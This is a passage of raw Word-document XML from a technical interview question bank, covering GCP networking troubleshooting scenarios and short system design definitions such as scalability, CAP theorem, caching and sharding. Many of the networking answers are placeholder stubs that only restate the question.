    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q938. Network Connectivity Center: What problem does GCP's Network Connectivity Center (NCC) solve, how does its hub-and-spoke model work for connecting VPCs, on-premises sites, and other clouds, and how does it compare to manually meshing VPC Peering and VPNs together?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Network Connectivity Center: What problem does GCP's Network Connectivity Center (NCC) solve, how does its hub-and-spoke model work for connecting VPCs, on-premises sites, and other clouds, and how does it compare to manually meshing VPC Peering and VPNs together?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP Networking - Troubleshooting Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q939. Scenario: A newly added subnet's VMs have no public IP and can't reach any Google API, even though an existing GKE workload reaches Google APIs fine over private IP. Walk through your diagnosis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: A newly added subnet's VMs have no public IP and can't reach any Google API, even though an existing GKE workload reaches Google APIs fine over private IP. Walk through your diagnosis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q940. Scenario: Two VPCs are peered and the peering shows ACTIVE, but a service in VPC A still can't reach a service in VPC B. What would you check (CIDR overlap, custom route export/import, firewall rule scope)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: Two VPCs are peered and the peering shows ACTIVE, but a service in VPC A still can't reach a service in VPC B. What would you check (CIDR overlap, custom route export/import, firewall rule scope)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q941. Scenario: After migrating from Cloud VPN to Dedicated Interconnect, some traffic intermittently still routes over the old VPN tunnel. How would you debug route priority and BGP behavior?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: After migrating from Cloud VPN to Dedicated Interconnect, some traffic intermittently still routes over the old VPN tunnel. How would you debug route priority and BGP behavior?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q942. Scenario: Requests to a Global HTTPS Load Balancer intermittently get connection resets, but only from certain regions. How would you debug backend health checks, Cloud CDN cache-fill behavior, and regional backend capacity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: Requests to a Global HTTPS Load Balancer intermittently get connection resets, but only from certain regions. How would you debug backend health checks, Cloud CDN cache-fill behavior, and regional backend capacity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q943. Scenario: A VPC-native GKE cluster runs out of usable Pod IPs and new pods can't schedule even though nodes have CPU/memory headroom. How would you diagnose and fix this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: A VPC-native GKE cluster runs out of usable Pod IPs and new pods can't schedule even though nodes have CPU/memory headroom. How would you diagnose and fix this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q944. Scenario: A Cloud Run service using a Serverless VPC Access connector times out under load but works fine at low traffic. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: A Cloud Run service using a Serverless VPC Access connector times out under load but works fine at low traffic. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q945. Scenario: Firewall rules appear to block SSH from the internet, but an instance is still reachable on port 22 externally. How would you trace hierarchical firewall policy precedence and rule evaluation order to find the gap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: Firewall rules appear to block SSH from the internet, but an instance is still reachable on port 22 externally. How would you trace hierarchical firewall policy precedence and rule evaluation order to find the gap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q946. Scenario: VPC Flow Logs show a production service repeatedly connecting to an unexpected external IP outside business hours. How would you investigate and contain it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: VPC Flow Logs show a production service repeatedly connecting to an unexpected external IP outside business hours. How would you investigate and contain it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q947. Scenario: Network Intelligence Center reports a connectivity test as unreachable between two GKE clusters in different projects on a Shared VPC, but a manual curl from a debug pod worked five minutes earlier. How would you reconcile the two signals and keep debugging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: Network Intelligence Center reports a connectivity test as unreachable between two GKE clusters in different projects on a Shared VPC, but a manual curl from a debug pod worked five minutes earlier. How would you reconcile the two signals and keep debugging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q948. Scenario: After a region-level outage, DNS failover did not redirect traffic to the healthy region and the app was down for 20 minutes despite a healthy secondary region. How would you redesign for faster or automatic failover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Scenario: After a region-level outage, DNS failover did not redirect traffic to the healthy region and the app was down for 20 minutes despite a healthy secondary region. How would you redesign for faster or automatic failover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q949. Scenario: You need to migrate an organization from a legacy single flat VPC to a Shared VPC host/service-project model with zero downtime for existing production workloads. How would you plan and execute this network migration - subnet/CIDR re-planning, firewall rule migration, IAM for host/service projects, and cutover sequencing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking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Scenario: You need to migrate an organization from a legacy single flat VPC to a Shared VPC host/service-project model with zero downtime for existing production workloads. How would you plan and execute this network migration - subnet/CIDR re-planning, firewall rule migration, IAM for host/service projects, and cutover sequencing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>System Design &amp; Architecture (761–860)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q950. What is system design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: System design is the process of defining architecture, components, data flow, scalability, reliability, security, and operational behavior for a software system. In interviews, it is important to clarify requirements, estimate scale, choose tradeoffs, and explain failure handling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>System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Q951. Explain scalability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scalability is the ability of a system to handle increased load by adding resources or improving efficiency. It can involve horizontal scaling, vertical scaling, caching, partitioning, asynchronous processing, and autoscaling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Scalability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Q952. What is horizontal scaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Horizontal scaling adds more instances, nodes, or replicas to handle load. It is common for stateless services and works well with load balancing and autoscaling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Horizontal Scaling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Q953. Explain vertical scaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vertical scaling increases the size of an existing machine, such as more CPU, memory, or disk. It is simpler than horizontal scaling but has hardware limits and can be less resilient.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vertical Scaling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Q954. What is high availability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: High availability means designing systems to remain operational despite failures. It uses redundancy, health checks, failover, multi-zone deployment, backups, and automated recovery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>High Availability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Q955. Explain fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fault tolerance is the ability to continue operating when components fail. It requires redundancy, retries, replication, isolation, graceful degradation, and failure-aware design.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Fault Tolerance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Q956. What is resiliency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Resiliency is the ability of a system to absorb failures, recover quickly, and continue delivering acceptable service. It combines reliability engineering, observability, automation, and tested recovery practices.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Resiliency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Q957. Explain load balancing strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Load balancing strategies include round robin, least connections, weighted routing, hash-based routing, geo routing, and latency-based routing. Health checks are essential so traffic is not sent to unhealthy backends.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Load Balancing Strategies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Q958. What is distributed system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A distributed system is a system made of multiple networked components that work together as one service. It must handle latency, partial failures, consistency, coordination, scaling, and observability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed System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Q959. Explain CAP theorem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CAP theorem states that in a network partition, a distributed system must choose between consistency and availability. Real systems choose tradeoffs based on business requirements and failure modes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cap Theorem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Q960. What is eventual consistency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Eventual consistency means replicas may temporarily differ but will converge if no new updates occur. It improves availability and scalability but requires clients to tolerate stale reads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Eventual Consistency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Q961. Explain strong consistency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Strong consistency ensures reads reflect the latest committed write. It simplifies correctness but may increase latency or reduce availability during partitions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Strong Consistency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Q962. What is message queue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A message queue stores messages between producers and consumers for asynchronous processing. It decouples services, smooths traffic spikes, supports retries, and improves resilience.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Message Queue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Q963. Explain Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kafka is a distributed event streaming platform for high-throughput publish-subscribe messaging. It stores ordered records in topics and partitions, making it useful for streaming, event sourcing, and data pipelines.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kafka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Q964. What is RabbitMQ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RabbitMQ is a message broker that supports queues, exchanges, routing keys, acknowledgments, and reliable messaging. It is often used for task queues and application-level messaging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rabbitmq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Q965. Explain event-driven architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Event-driven architecture uses events to trigger communication between services. It improves decoupling, scalability, and responsiveness, but requires careful handling of ordering, retries, idempotency, and observability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Event-driven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Q966. What is microservices architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Microservices architecture decomposes an application into independently deployable services around business capabilities. It improves team autonomy and scalability but adds complexity in networking, data consistency, and operations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Microservices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Q967. Explain monolith vs microservices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A monolith packages application logic into one deployable unit, which is simpler to develop and operate early. Microservices split functionality into services, enabling independent scaling and deployment but increasing distributed-system complexity.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Monolith Vs Microservices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Q968. Explain service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Service discovery lets clients find service instances dynamically. It is important in elastic environments where instances start, stop, and move frequently.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Service Discovery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Q969. What is circuit breaker?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A circuit breaker stops calls to a failing dependency after errors cross a threshold. It prevents cascading failures and gives dependencies time to recover.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Circuit Breaker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Q970. Explain retry mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Retry mechanisms repeat failed operations when failures are likely temporary. They should use backoff, jitter, timeouts, limits, and idempotency to avoid amplifying incidents.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Retry Mechanisms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Q971. What is rate limiting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Rate limiting controls how many requests a client or service can make in a time window. It protects systems from abuse, overload, and noisy clients.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rate Limiting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Q972. Explain caching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Caching stores frequently used data closer to the requester to reduce latency and backend load. Good caching needs invalidation strategy, TTLs, consistency expectations, and capacity planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Caching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Q973. What is Redis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Redis is an in-memory data store used for caching, sessions, queues, counters, rate limiting, and lightweight data structures. It provides very low latency but requires careful persistence and memory management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Redis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Q974. Explain CDN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A CDN caches content at edge locations close to users. It reduces latency, improves availability, lowers origin load, and helps absorb traffic spikes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cdn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Q975. What is edge computing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Edge computing runs compute closer to users or devices to reduce latency and bandwidth usage. It is useful for IoT, real-time inference, content delivery, and privacy-sensitive workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Edge Computing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Q976. Explain multi-region architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-region architecture deploys systems across multiple geographic regions for resilience, latency, or compliance. It requires careful traffic routing, data replication, failover, and operational testing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Multi-region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Q977. What is disaster recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Disaster recovery is the plan and architecture for restoring service after major failures. It defines RTO, RPO, backups, replication, failover, runbooks, and regular testing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Disaster Recovery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Q978. Explain active-passive architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Active-passive architecture has one active site serving traffic and a standby site ready for failover. It is simpler than active-active but may have higher recovery time.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Active-passive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Q979. What is active-active setup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Active-active setup runs multiple sites serving traffic simultaneously. It improves availability and latency but needs robust data consistency and conflict handling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Active-active Setup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Q980. Explain data partitioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data partitioning splits data into smaller parts to improve scalability, performance, and manageability. Partitioning can be by range, hash, time, tenant, or geography.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Data Partitioning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Q981. What is sharding?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
